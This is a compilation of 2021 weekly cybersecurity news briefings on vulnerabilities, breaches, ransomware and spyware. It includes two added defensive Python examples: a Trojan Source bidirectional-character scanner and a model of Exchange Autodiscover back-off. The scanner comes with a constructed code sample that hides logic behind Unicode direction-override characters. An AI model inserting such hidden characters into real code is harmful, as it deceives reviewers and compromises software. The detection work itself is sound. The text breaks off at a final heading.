Security researcher @testanull has published a working proof of concept (PoC) for the vulnerability identified as CVE-2021-4231 (CVSS 8.8), which affects Microsoft Exchange and was fixed by Microsoft in the November security bulletin. The vulnerability is said to affect Exchange Server 2016 and 2019 on-premises services and could allow an authenticated attacker to execute arbitrary code remotely. Microsoft reports that it has occasionally detected activity related to the exploitation of this vulnerability in targeted attacks, so it recommends applying the fix.
It should be noted that this would not be the first time in 2021 that vulnerabilities in the Microsoft Exchange service have been exploited to carry out attacks, as attempts to exploit ProxyLogon and ProxyShell are well known. It is recommended to use the Exchange diagnostic tool to check for possible exposure to these vulnerabilities.
All the details: https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169

New Windows 0-day with public exploit
Security researcher Abdelhamid Naceri has made public an exploit for a new 0-day in Windows that would allow an attacker to gain administrator privileges and affects all versions of Windows, including Windows 10, Windows 11 and Windows Server 2022. Naceri managed to bypass the patch that Microsoft included in its November monthly bulletin for an escalation of privilege vulnerability in Windows Installer (CVE-2021-41379), a vulnerability that he himself had reported to Microsoft. Following this new discovery, he identified a new 0-day for which he has now decided to publish the exploit (InstallerFileTakeOver) on his GitHub account. With the publication of this exploit, Naceri intends to join the discontent already expressed by other researchers with Microsoft over what they claim is a continuous degradation of the bounties paid for reports to the firm. Microsoft is expected to patch the new bug in its next bulletin. The researcher recommends waiting for the official fix given the complexity of the vulnerability. Cisco Talos security researchers have reportedly already detected malware samples that are trying to exploit the new 0-day. Researchers have indicated that the exploitation attempts observed are part of low-volume attacks, so they could be tests to fine-tune the exploits and can therefore be understood as a possible preliminary step before larger-scale campaigns.
More information: https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/

Security breach at GoDaddy
Domain registrar GoDaddy has made public a security incident detected on November 17th, in which an unauthorised third party allegedly gained access to the company's Managed WordPress hosting environment via a compromised password. The investigation, which is still ongoing, has determined that the attacker had access to customer information from the 6th of September of this year until the time of detection, at which point the attacker was blocked and expelled from the system. The information exposed includes the email address and customer number of 1.2 million active and inactive Managed WordPress users, the WordPress administrator password set at the time of provisioning, the sFTP and database usernames and passwords of active users, and the private key of the SSL certificates of certain active users. The company is contacting customers affected by this security breach. It is worth noting that GoDaddy also suffered a data breach in May last year.
Learn more: https://www.sec.gov/Archives/edgar/data/1609711/000160971121000122/gddyblogpostnov222021.htm

Vulnerabilities in MediaTek allow spying on Android devices
Semiconductor company MediaTek has fixed several security flaws that could have allowed attackers to eavesdrop on phone calls on Android devices, execute commands or escalate privileges. MediaTek's SoCs (System on a Chip) are embedded in around 37% of the world's smartphones and IoT devices, including devices from brands such as Xiaomi, Realme and Vivo, among others. Three of these vulnerabilities (CVE-2021-0661, CVE-2021-0662 and CVE-2021-0663) are due to incorrect boundary checking and were fixed in MediaTek's security bulletin last October, all with a CVSS of 6.7. The fourth vulnerability has been assigned the identifier CVE-2021-0673 but has not yet been fixed.
The company will publish more details about the flaw, as well as its fix, in the next security bulletin, to be published in December.
More: https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp/
November 26, 2021
Cyber Security
Cyber Security Weekly Briefing 30 October-5 November
Trojan Source: vulnerability in source code compilers
Researchers at the University of Cambridge have published a paper detailing a new attack method called "Trojan Source" that exploits a flaw in most existing source code compilers and software development environments. The method exploits features of text encoding standards such as Unicode, making modifications that introduce vulnerabilities into the source code that go unnoticed by a human reader, and it can be implemented in major programming languages such as C, C++, C#, JavaScript, Java, Rust, Go and Python. As a result, such an attack could lead to a compromise of the software supply chain. In addition, the research warns that vulnerabilities introduced in source code survive the copy and paste functions of most modern browsers, editors and operating systems, meaning that any developer copying code from an untrusted source into a protected code base could inadvertently introduce "invisible" vulnerabilities into a system. The researchers have already shared these findings with 19 organisations involved, many of which are already developing updates to address the problem in code compilers, interpreters, code editors and repositories (e.g., Rust has catalogued it under the identifier CVE-2021-42574). There are also several proofs of concept that simulate attacks in the programming languages described.
All information: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/146100_trojan-source.pdf

BlackMatter announces operational shutdown under pressure from authorities
Threat actors linked to the BlackMatter ransomware have announced the shutdown of operations due to pressure from local authorities. Researchers from the VX-Underground platform have released a screenshot of the statement, posted on the private RaaS (Ransomware-as-a-Service) website where the operators communicate and offer their services to affiliates.
Originally written in Russian, the translated message states that BlackMatter's infrastructure will be shut down in the next 48 hours, although they leave open the possibility of continuing to provide affiliates with the necessary decryptors to continue their extortion operations. Some media reports suggest that the group's motivation comes in response to the recent publication of reports by Microsoft and Gemini Advisory linking the FIN7 group (believed to be the creators of BlackMatter) to the public company Bastion Secure, as well as an increase in arrests of individuals belonging to other ransomware groups.
More: https://twitter.com/vxunderground/status/1455750066560544769

Mekotio banking trojan is back with an improved campaign
Check Point researchers have detected a new campaign of the Mekotio banking trojan with more than a hundred attacks in recent weeks via phishing emails containing malicious links or zip file attachments. According to the researchers, this new wave of attacks started after the operation carried out by the Spanish Guardia Civil last July, which led to the arrest of 16 people involved in the distribution of this malware. However, current indications point to Brazil as the command centre of Mekotio's operators, while some collaboration from Spain is maintained. Mekotio's main objective is the theft of banking credentials from Spanish-speaking users, and its current version brings striking new features in its attack flow, as its developers have achieved greater stealth and concealment when implementing their techniques. Apart from having more layers of obfuscation, the zip attached to the phishing emails contains a script with geolocation and analysis capabilities that allow it to discriminate victims based on their nationality or even detect whether the malware is running in a virtual machine, allowing the threat actor to evade detection and therefore successfully deploy the malware.
All details: https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/

Threat actor Tortilla campaign distributing Babuk ransomware
Cisco Talos security researchers have identified an active campaign aimed at deploying Babuk ransomware by exploiting Microsoft Exchange servers vulnerable to ProxyShell and PetitPotam. This campaign is reportedly run by the threat actor known as Tortilla, a group that has been active since July 2021 and primarily targets organisations located in the United States, as well as, to a lesser extent, the United Kingdom, Germany, Ukraine, Finland, Brazil, Honduras and Thailand. The infection process usually starts with a downloader in DLL or EXE format, which executes an obfuscated PowerShell command and downloads the final Babuk ransomware payload, injecting it into a new ad-hoc process (AddInProcess32). Additionally, researchers have also observed the presence of the China Chopper webshell on multiple infected systems, as well as attempted exploitation of other vulnerabilities in Atlassian, Apache Struts, Oracle WebLogic or WordPress.
More details: https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html
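Returning to the Trojan Source item in this briefing: the technique relies on Unicode bidirectional control characters (overrides, embeddings and isolates) that change how code is displayed without changing what the compiler parses. The scanner below is an added example written for this page, not code from the Cambridge paper or from any affected project; it flags every such character in a constructed source snippet and produces a rendering in which the hidden controls are visible to a reviewer.

```python
"""Scanner for Unicode bidirectional (Bidi) control characters in source code.

Added example for this page, not code from the Trojan Source paper or from any
affected compiler project. Trojan Source hides logic by inserting Bidi
override/embedding/isolate characters, which reorder how text is displayed
without changing the token stream a compiler sees. Flagging these characters
in source files, commits and pasted code is the corresponding defensive check.
"""
import unicodedata
from typing import List, NamedTuple

# Bidi control characters: LRE, RLE, PDF, LRO, RLO (U+202A..U+202E) and
# LRI, RLI, FSI, PDI (U+2066..U+2069).
BIDI_CONTROLS = frozenset(
    [chr(c) for c in range(0x202A, 0x202F)] + [chr(c) for c in range(0x2066, 0x206A)]
)


class Finding(NamedTuple):
    line: int       # 1-based line number
    column: int     # 1-based column, counted in code points
    codepoint: str  # e.g. "U+202E"
    name: str       # Unicode character name, e.g. "RIGHT-TO-LEFT OVERRIDE"


def find_bidi_controls(text: str) -> List[Finding]:
    """Return every Bidi control character in `text`, in document order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                findings.append(
                    Finding(lineno, col, f"U+{ord(ch):04X}", unicodedata.name(ch))
                )
    return findings


def render_visible(line: str) -> str:
    """Replace each Bidi control with a visible <U+XXXX> marker so a reviewer
    can see exactly where the displayed order was being manipulated."""
    return "".join(
        f"<U+{ord(ch):04X}>" if ch in BIDI_CONTROLS else ch for ch in line
    )


def strip_bidi_controls(text: str) -> str:
    """Remove Bidi controls entirely (for a pre-commit hook that rejects or
    rewrites offending files)."""
    return "".join(ch for ch in text if ch not in BIDI_CONTROLS)


def scan_file(path: str) -> List[Finding]:
    """Scan a file on disk; errors="replace" keeps the scan going on odd bytes."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_bidi_controls(fh.read())


# Constructed sample (not from the paper): line 2 reads as a comment, but it
# carries RLO, LRI and PDI controls, so an editor that honours Bidi displays
# its characters in a different order from the one the interpreter reads.
SAMPLE_SOURCE = (
    "def is_admin(user):\n"
    "    # \u202e } \u2066 if user.role == 'admin': \u2069\n"
    "    return False\n"
)

if __name__ == "__main__":
    for f in find_bidi_controls(SAMPLE_SOURCE):
        print(f"line {f.line} col {f.column}: {f.codepoint} {f.name}")
    print(render_visible(SAMPLE_SOURCE.splitlines()[1]))
```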
November 5, 2021
Cyber Security
Cyber Security Weekly Briefing 9-15 October
Microsoft Security Bulletin
Microsoft has published its security bulletin for the month of October, in which it has fixed a total of 81 bugs in its software, including 4 0-day vulnerabilities. Of the 81 bugs, 3 have been categorised as critical severity. The first 0-day, CVE-2021-40449 with a CVSS of 7.8, is an elevation of privilege flaw that has been exploited in attack campaigns against IT companies and military and diplomatic entities. The second 0-day (CVE-2021-40469, CVSS 7.2) is a remote code execution vulnerability in Windows DNS Server. The third (CVE-2021-41335, CVSS 7.8) is an elevation of privilege bug in the Windows kernel. The last one, CVE-2021-41338 with a CVSS of 5.5, is a security bypass vulnerability in the Windows AppContainer Firewall. On the other hand, the 3 fixed critical severity bugs correspond to remote code execution vulnerabilities, two of them in Windows Hyper-V (CVE-2021-38672 and CVE-2021-40461) and the remaining one (CVE-2021-40486) in Microsoft Word. It is recommended to apply the security updates as soon as possible.
More info: https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct

Vulnerability in OpenSea NFT platform allows cryptocurrency wallets to be stolen
Check Point researchers have found that malicious actors could empty cryptocurrency wallets through malicious NFTs on OpenSea, one of the largest digital marketplaces for buying and selling crypto assets. This platform, active since 2018, holds a total of 24 million NFTs (non-fungible tokens) and reached a trading volume of up to $3.4 billion in August 2021 alone. The attack method consists of creating an NFT in which the threat actor includes a malicious payload and then distributing it to victims. Several users reported that their wallets were emptied after receiving supposed gifts on the OpenSea marketplace, a marketing tactic known as "airdropping" used to promote new virtual assets.
Check Point identified that the platform allows uploading files with multiple extensions (JPG, PNG, GIF, SVG, MP4, WEBM, MP3, WAV, OGG, GLB, GLTF), so they ran a test to reproduce the attack scenario, uploading an SVG with a malicious payload capable of emptying the wallets of potential victims. The reported bugs have now been fixed.
All the details: https://research.checkpoint.com/2021/check-point-research-prevents-theft-of-crypto-wallets-on-opensea-the-worlds-largest-nft-marketplace/

Cyber-attacks against water treatment systems
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a new alert concerning cyber-attacks against drinking water and wastewater processing facilities. The activity observed includes attempts to compromise the integrity of systems through unauthorised access by both known and unknown threat actors. The advisory also points to known weaknesses of entities in this sector, such as their susceptibility to spear-phishing attacks, the exploitation of outdated and unsupported software and control systems, and the exploitation of remote access systems. Over the course of 2021, there have been several relevant incidents that fit this pattern, such as the identification in August of ransomware samples belonging to the Ghost and ZuCaNo families in the SCADA systems of plants in California, Nevada and Maine. Similarly, it is worth recalling the incident in February at a water treatment plant in Florida where a threat actor managed to modify the volumes of chemicals added to drinking water tanks.
Learn more: https://us-cert.cisa.gov/ncas/alerts/aa21-287a

Google warnings for government-backed attacks increase by 33%
Google's Threat Analysis Group (TAG) has published information on the number of warnings generated by its "Security warnings for suspected state-sponsored attacks" alert system, launched in 2012.
In the course of 2021, the system has sent more than 50,000 warnings to users, an increase of 33% compared to the same period in 2020. According to Google, this service monitors more than 270 attacker groups in 50 different countries, generating warnings when it detects phishing attempts, malware distribution or brute force attacks originating from the infrastructure of government-backed threat actors, known as Privateers. During 2021, Google highlights two threat actors that stand out above the rest based on the impact of their campaigns targeting activists, journalists, government officials or workers in national security structures: APT28 or "Fancy Bear", backed by Russia, and APT35 or "Charming Kitten", an Iranian threat actor active since at least 2014. In addition, the publication points out that receiving such an alert means that the account is considered a "target" and does not necessarily mean that it has been compromised, so users are encouraged to sign up for this service or otherwise enable two-factor authentication on their accounts.
All the info: https://blog.google/threat-analysis-group/countering-threats-iran/

TrickBot Gang duplicates and diversifies infection efforts
IBM researchers have tracked the activity of the ITG23 group, also known as the TrickBot Gang and Wizard Spider, after observing an expansion of the distribution channels used to infect organisations and businesses with Trickbot and BazarLoader, samples used to orchestrate targeted ransomware and extortion attacks. IBM's analysis suggests that this increase may have contributed to the spike in Conti ransomware activity reported by CISA last September. Researchers have also associated ITG23 with two groups involved in malware distribution, Hive0106 (also known as TA551) and Hive0107.
These are characterised by attacks aimed at infecting corporate networks with malware, using techniques such as email thread hijacking, the use of fake customer support response forms, and the use of underground call centres employed in BazarCall campaigns. These TTPs are reportedly leading to an increase in infection attempts by these groups.
More: https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/
October 15, 2021
Cyber Security
Cyber Security Weekly Briefing 18-24 September
Malware campaign using TeamViewer on websites under IIS
Malwarebytes researchers have observed a malware distribution campaign since the beginning of September that makes use of previously compromised pages running on Microsoft's Internet Information Services (IIS) web server. The attack vector consists of displaying a fake expired certificate alert such as "Detected a potential security risk and has not extended the transition to [sitename]. Updating a security certificate may allow this connection to succeed. NET::ERR_CERT_OUT_OF_DATE.", which in turn suggests that the user download a malicious "update installer" that actually contains an obfuscated copy of the known TVRAT trojan. Once the victim executes the malware, it installs itself alongside the TeamViewer remote control software, giving the threat actor direct communication with its command and control server and full control over the compromised computer. So far, the specific methods used to compromise the IIS servers are not known exactly, although different exploit codes are available for a flaw that Microsoft itself patched last May (CVE-2021-31166).
More info: https://www.bleepingcomputer.com/news/security/hacked-sites-push-teamviewer-using-fake-expired-certificate-alert/

BulletProofLink: massive phishing campaign
Microsoft security researchers have published details of a massive phishing-as-a-service (PHaaS) campaign that uses a hosting-like infrastructure and offers different services to threat actors, such as phishing kits and templates. According to the research, BulletProofLink, as this campaign is called, goes beyond traditional phishing kits: after an initial registration on its portal for a fee of $800, it offers a comprehensive service with hosting, domain generation, email sending, credential collection and stolen logins, which can then be adapted with modifications to the phishing templates, of which more than 120 are available.
However, Microsoft has also warned that BulletProofLink's operators trick their own customers by storing the credentials stolen in the attacks and then selling them on other underground forums. It is estimated that the campaign has used more than 300K unique newly created subdomains to date, which is evidence of the scale of this campaign's impact.
All the details: https://www.microsoft.com/security/blog/2021/09/21/catching-the-big-fish-analyzing-a-large-scale-phishing-as-a-service-operation/

Microsoft Exchange Autodiscover bug allows exfiltration of credentials
Amit Serper, security engineer at Guardicore, has discovered a new implementation bug in the Microsoft Exchange Autodiscover protocol which could allow credential exfiltration. Autodiscover is a protocol that Microsoft Exchange uses to give its customers an easy and automatic way to configure the Exchange client and its different applications, such as Outlook. Once the client is installed, it requests the username and password and then tries to use Autodiscover to build different URLs based on the user's email address. If none of these autogenerated URLs respond, a back-off phase is initiated, which tends to fail because it tries to resolve the Autodiscover.TLD part. Serper observed that whoever owns this Autodiscover.TLD domain would receive all requests that do not reach the original domain. To test the bug, Serper and his team purchased different Autodiscover domains with different TLDs, receiving requests from many customers from multiple industries. After testing, Guardicore reportedly obtained more than 90,000 unique credentials from different applications such as Outlook and more than 350,000 Windows domain credentials, concluding that the impact is global.
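The back-off described above can be modelled to see which hostnames a client would end up querying outside the organisation's control. The code below is an added example, not Guardicore's tooling or Microsoft's implementation; the exact candidate order is an assumption (in-domain names first, then one left-most label dropped per step down to Autodiscover.<TLD>), and the email addresses and domains are constructed.

```python
"""Model of the Exchange Autodiscover "back-off" described in the item above.

Added example, not Guardicore's code nor Microsoft's implementation. The exact
sequence of candidates is an assumption based on the described behaviour:
in-domain endpoints first, then the client "backs off" by dropping the
left-most label until only Autodiscover.<TLD> remains. external_lookups()
lists the names that would leave the organisation's control; those are the
ones a defender wants to sinkhole in DNS, block at the egress proxy or pre-empt.
"""
from typing import List, Sequence

AUTODISCOVER_PATH = "/autodiscover/autodiscover.xml"


def _domain_labels(email: str) -> List[str]:
    """Split the mail domain of `email` into its DNS labels (lower-cased)."""
    if email.count("@") != 1:
        raise ValueError(f"not a single mailbox address: {email!r}")
    domain = email.rsplit("@", 1)[1].strip().lower().rstrip(".")
    labels = [part for part in domain.split(".") if part]
    if len(labels) < 2:
        raise ValueError(f"mail domain needs at least two labels: {domain!r}")
    return labels


def candidate_hosts(email: str) -> List[str]:
    """Hostnames the client would try, in the assumed order."""
    labels = _domain_labels(email)
    domain = ".".join(labels)
    hosts = [domain, f"autodiscover.{domain}"]  # attempts inside the mail domain
    for i in range(1, len(labels)):             # back-off: drop left-most label
        hosts.append("autodiscover." + ".".join(labels[i:]))
    return hosts


def candidate_urls(email: str) -> List[str]:
    """Full Autodiscover URLs for the candidate hosts."""
    return [f"https://{host}{AUTODISCOVER_PATH}" for host in candidate_hosts(email)]


def is_under(host: str, domain: str) -> bool:
    """True if `host` equals `domain` or is a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def external_lookups(email: str, org_domains: Sequence[str]) -> List[str]:
    """Candidates that fall outside every domain the organisation controls."""
    controlled = [d.strip().lower().rstrip(".") for d in org_domains]
    return [
        h for h in candidate_hosts(email)
        if not any(is_under(h, d) for d in controlled)
    ]


if __name__ == "__main__":
    # Constructed addresses and organisation domains.
    for email, org in [("alice@mail.example.com", ["example.com"]),
                       ("bob@corp.example.co.uk", ["example.co.uk"])]:
        print(email)
        for url in candidate_urls(email):
            print("  ", url)
        print("   leaves the organisation:", external_lookups(email, org))
```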
Learn more: https://www.guardicore.com/labs/autodiscovering-the-great-leak/

New 0-day vulnerability in Apple exploited on iOS and macOS devices
Google security researchers have reported to Apple a new 0-day vulnerability affecting iOS and macOS devices. Apple itself has also acknowledged that this flaw may be being actively exploited in the wild by threat actors. Specifically, the vulnerability is located in the kernel of the XNU operating system; it has been registered as CVE-2021-30869 and for the moment has not been assigned a criticality on the CVSSv3 scale. However, it should be noted that this is a "type confusion" bug that can lead to arbitrary code execution on a compromised device, so its criticality is in any case considered high. It should also be noted that in 2021 alone, Apple has already had to resolve more than 10 0-day vulnerabilities. In this case, the patches that solve the problem are already available for the following affected devices: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3 and iPod touch (6th generation) with iOS 12.5.5, and Mac with security update 2021-006 Catalina.
Full info: https://support.apple.com/en-us/HT212824
September 24, 2021
Cyber Security
Cyber Security Weekly Briefing 28 August - 3 September
PoC available and scans detected for RCE in Confluence
On Wednesday 25 August, Confluence published a security advisory warning of a vulnerability in Confluence Server and Data Center in versions prior to 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. In the advisory, the firm clarified that the flaw does not affect Confluence Cloud customers. The vulnerability, which has been given the identifier CVE-2021-26084 and a CVSS of 9.8, is specifically an OGNL (Object-Graph Navigation Language) injection vulnerability that would allow an authenticated user, and in some cases even an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. Just a few days later, on Sunday 29 August, some security researchers announced that they had managed to execute code remotely without authentication in a relatively simple way, but they had not yet made the details of the PoC public, delaying them for a few days until yesterday, September 1st. Although the PoC was not initially public, on August 31st mass scans for vulnerable Confluence servers were already being reported.
More: https://therecord.media/confluence-enterprise-servers-targeted-with-recent-vulnerability/

ChaosDB - Critical vulnerability in Microsoft Azure Cosmos DB
Security researchers from Wiz have discovered a critical vulnerability in Azure, Microsoft's cloud platform, that allows the complete remote takeover of Cosmos DB accounts with admin privileges. Due to the severity of this flaw, the researchers have not published all of its technical details or the means to exploit it. However, they have confirmed that #ChaosDB is triggered by the chained exploitation of a series of vulnerabilities in the Jupyter Notebook feature of Cosmos DB. By exploiting these flaws, a threat actor could obtain credentials for the targeted Cosmos DB, Jupyter Notebook and Jupyter Notebook Storage accounts.
With those credentials, the attacker would be able to view, modify and erase data from the Cosmos DB accounts. In the article, Wiz has posted a video showing the exploitation chain. Microsoft patched the flaw on August 12th, less than 48 hours after being warned by Wiz, but it took some days until it sent a warning, on August 26th, to 30% of Cosmos DB users. In this warning, Microsoft stated that there was no evidence that the vulnerability was being exploited, but urged users to reset their primary keys as a security measure. Meanwhile, Wiz has indicated that the number of potentially affected customers could be bigger than the one assessed by Microsoft and has recommended that all users take all necessary security measures.
All the details: https://chaosdb.wiz.io/

ProxyToken - New Microsoft Exchange vulnerability
Security researchers at the Zero Day Initiative have published technical details about a severe vulnerability in Microsoft Exchange Server called ProxyToken. The flaw, listed under the identifier CVE-2021-33766 and with a CVSSv3 of 7.3, is specifically an information disclosure vulnerability that could reveal victims' personal information or sensitive company data, among other things. Microsoft Exchange uses two websites: the front end, to which users connect to access email and which largely functions as a proxy for the back end, to which it passes authentication requests. The problem identified lies in a feature called DelegatedAuthModule: the front end passes through, without authenticating them, requests that carry a SecurityToken cookie, which marks them as to be handled directly by the back end. When the front end receives a request with the SecurityToken cookie, it assumes that the back end is solely responsible for authenticating it.
However, the back end is completely unaware that it needs to authenticate some incoming requests based on the SecurityToken cookie, since DelegatedAuthModule is not loaded on installations that have not been condivd to use the special delegated authentication feature. The result is that requests can pass through, without being subjected to authentication on the front-end or back-end. Microsoft addressed the issue as part of its July updates and recommends that all Exchange server administrators who have not installed the appropriate patches prioritise this task. Learn more: https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server BrakTooth: vulnerabilities affecting Bluetooth devices The ASSET research team has published a total of 16 security advisories, addressing 20 vulnerabilities affecting the Bluetooth software stack on System-on-Chip (SoC) boards from eleven different suppliers. It is estimated that billions of devices are affected, including mobile devices, computers, tablets, etc. According to the researchers, exploiting these security flaws could allow denial-of-service attacks or the execution of malicious code, although the impact would differ depending on the SoC board model and Bluetooth software stack used. The vulnerabilities identified include CVE-2021-28139, which allows remote code execution on devices with ESP32 SoC boards from Espressif Systems via Bluetooth LMP packets. So far, only three of the affected suppliers have released patches: Espressif Systems, Infineon and Bluetrum. Others, such as Intel, continue to work on this issue, and some, such as Texas Instruments, have indicated that they will not address the issue, while Qualcomm will only work on a part of the issue. Info: https://asset-group.github.io/disclosures/braktooth/
September 3, 2021
Cyber Security
Cyber Security Weekly Briefing 14-27 August
Exploitation of vulnerabilities in Exchange ProxyShell

Security researcher Kevin Beaumont has analysed the recent massive exploitation of the Microsoft Exchange Server vulnerabilities known as ProxyShell. These are a set of flaws revealed by Orange Tsai during the BlackHat conferences and comprise the following vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. In his publication, Beaumont explains how to identify potentially affected systems and urges security teams to patch the flaws as soon as possible. This is because, as revealed by Symantec, the LockFile ransomware team has been taking advantage of these vulnerabilities to access victims' networks and then using the PetitPotam vulnerability, which is yet to be fully patched, to access the domain controller and spread through the network. So far, at least 10 companies affected by this campaign have been identified, mainly located in the US and Asia. Given the circumstances, CISA has published guidelines for identifying affected systems and possible mitigations. The Microsoft Exchange team has published a new warning updating last week's information on the set of vulnerabilities known as ProxyShell. The purpose of this new publication is to confirm that Exchange servers are protected if the Microsoft monthly patches for May and July are installed; the team also recommends keeping this type of software constantly updated. The article includes a series of guidelines that allow teams to identify vulnerable Exchange servers. Moreover, researchers from Huntress have issued several updates to the post in which they have been analysing these vulnerabilities, reporting the detection of over 140 webshells already installed on vulnerable servers belonging to companies from various sectors. According to the researchers, some of the dates on which configuration was tampered with go back to March, April, June and July, which suggests a connection with ProxyLogon.

All the details: https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c

Realtek vulnerabilities exploited to distribute malware

In mid-August, IoT Inspector Research Lab disclosed four vulnerabilities in a software SDK distributed as part of Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors. Among the four issues discovered, the critical vulnerability classified as CVE-2021-35395 received the highest severity rating, 9.8 CVSSv3. Effective exploitation of these bugs could allow unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Although Realtek released patches a day before IoT Inspector published its findings, researchers at Seamless Network have detected attempts to exploit these vulnerabilities to propagate a variant of the Mirai malware. Furthermore, according to Seamless Network's scans, the most common device models currently running the vulnerable Realtek SDK are the Netis E1+ extender, the Edimax N150 and N300 Wi-Fi routers and the Repotec RP-WR5444 router; the researchers recommend that owners of such devices look for new firmware patches or ask their vendors about them.

Learn more: https://securingsam.com/realtek-vulnerabilities-weaponized/

38 million records exposed due to Microsoft Power Apps misconfiguration

The UpGuard team has published a report about a misconfiguration in Microsoft Power Apps that resulted in the exposure of more than 38 million personal data records. Microsoft Power Apps allows companies and institutions to create custom applications and can enable the OData (open data protocol) API to retrieve user data from Power Apps lists. On 24 May, UpGuard detected that lists with Power Apps data could be accessed anonymously via the OData API, because access is not restricted by default. The investigation discovered thousands of lists accessible on hundreds of portals, including those of private companies and public administrations, with data ranging from email addresses, vaccination appointments, first and last names and phone numbers to social security numbers. Microsoft has changed the default settings to address the problem and has contacted affected customers, as has UpGuard, which alerted 47 affected entities.

Full info: https://www.upguard.com/breaches/power-apps

New iPhone exploit used to deploy Pegasus spyware

Researchers at Citizen Lab have detected a new zero-click iMessage exploit, called FORCEDENTRY, that was used to deploy NSO Group's Pegasus spyware. FORCEDENTRY was used to target the devices of at least nine Bahraini activists, including members of the Bahrain Center for Human Rights, Waad and Al Wefaq, between June 2020 and February 2021. At least four of the activists are believed to have been compromised by LULU, a Pegasus operator attributed with high confidence to the government of Bahrain. The report also points out that one of the hacked activists was living in London at the time of the compromise, making this the first documented compromise by the Bahraini government of a device used by an activist in Europe. The Citizen Lab report also states that some of the activists' phones suffered zero-click iMessage attacks that, besides FORCEDENTRY, also involved the 2020 KISMET exploit. Experts recommend disabling iMessage and FaceTime to prevent the attacks mentioned in the report, although powerful spyware like the one developed by NSO Group has many other exploits in its arsenal.

More: https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/

Vulnerability in Kalay protocol affects millions of IoT devices

Researchers at Mandiant have discovered, in coordination with the Cybersecurity and Infrastructure Security Agency (CISA), a vulnerability in IoT devices that use the Kalay network protocol from the manufacturer ThroughTek. The vulnerability, classified as CVE-2021-28372, allows an attacker to connect remotely to the devices without authorisation, compromising their integrity and allowing audio eavesdropping, real-time video viewing and even the compromise of device credentials. The manufacturer has so far been unable to determine the number of affected devices because of the way the protocol is integrated into the products' software, although it is estimated that there are at least 85 million active devices using this protocol. Versions prior to 3.1.10 and 3.4.2.0 are affected by this vulnerability.

All the details: https://www.fireeye.com/blog/threat-research/2021/08/mandiant-discloses-critical-vulnerability-affecting-iot-devices.html
August 27, 2021
Cyber Security
Cyber Security Weekly Briefing 17-23 July
Global cyber-espionage investigation published

A joint consortium of organisations and media outlets has published an investigation revealing the indiscriminate marketing and use of Pegasus spyware. According to the investigators, a data leak has identified at least 10 governments as potential customers of the Israeli company NSO Group, which owns Pegasus. The leak contains a list of more than 50,000 phone numbers of "persons of interest" dating from 2016. Identified victims reportedly include corporate executives, religious figures, academics, NGO employees, trade union leaders and members of several governments. Pegasus' functionalities include targeting iOS or Android devices in order to exfiltrate messages, emails and photos, record calls and activate microphones. Both the company and some of the states involved have denied its use for such purposes. It is worth noting that this spyware was allegedly used last year to infect Jeff Bezos' device. Since the publication, news and reactions have continued to emerge. On the one hand, Amazon Web Services has reported closing infrastructure and accounts linked to NSO Group, the owner of Pegasus, after it became public that the company had used AWS infrastructure to carry out espionage tasks. In addition, Apple's share price fell yesterday following news of the active exploitation of multiple 0-days on an iPhone 12 updated to the latest iOS 14.6 operating system. It is also worth noting that the United Nations Office in Geneva has tweeted a reminder to countries that all surveillance measures must be carried out under justified and narrowly defined circumstances, with a legitimate aim, and be proportional to that aim.

All the details: https://amp.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus

Malware distribution campaign targeting Spanish-speaking corporate users

Proofpoint's team has identified a new threat group, named TA2721, that is distributing malware via emails written in Spanish. This group targets users with Spanish surnames who belong to global organisations in different industries. Because the targets are so specific, researchers raise the possibility that the group performs some kind of reconnaissance of the targeted entities before sending the fraudulent emails. The TA2721 infection chain is characterised by the use of PDF documents attached to the emails, which contain a URL that redirects to the download of an encrypted, compressed .RAR file that eventually installs the Bandook malware on the victim's computer, an old and rarely seen RAT. Researchers have found that this threat actor tends to use the same C2 infrastructure for several weeks or months; in fact, in six months Proofpoint has identified only three domains acting as C2.

More info: https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook

SeriousSAM: Privilege escalation vulnerability in Windows 10

Security researcher Jonas Lyk, along with other experts, has discovered a vulnerability in Windows 10 that would allow threat actors to escalate privileges and access hashed user account passwords and important system configuration details. The flaw, named SeriousSAM (CVE-2021-36934), lies in the way Windows 10 controls access to the SAM, SECURITY and SYSTEM files (within C:\Windows\System32) since Windows 10 v1809. In these versions, Microsoft fails to restrict access to these configuration files in the backups generated by the Windows Volume Shadow Copy functionality. Microsoft has not yet released security patches or mitigations for this vulnerability, but it has shared a workaround while it continues to investigate the flaw. Meanwhile, some tips for system administrators and security providers on how to log and monitor access to SAM data have been posted on Reddit. In addition, Kevin Beaumont has published a proof of concept that allows system administrators to test which of their systems are vulnerable to these attacks. Finally, US-CERT has also published a briefing note on the flaw.

Learn more: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934

XLoader: Formbook variant for Windows and macOS

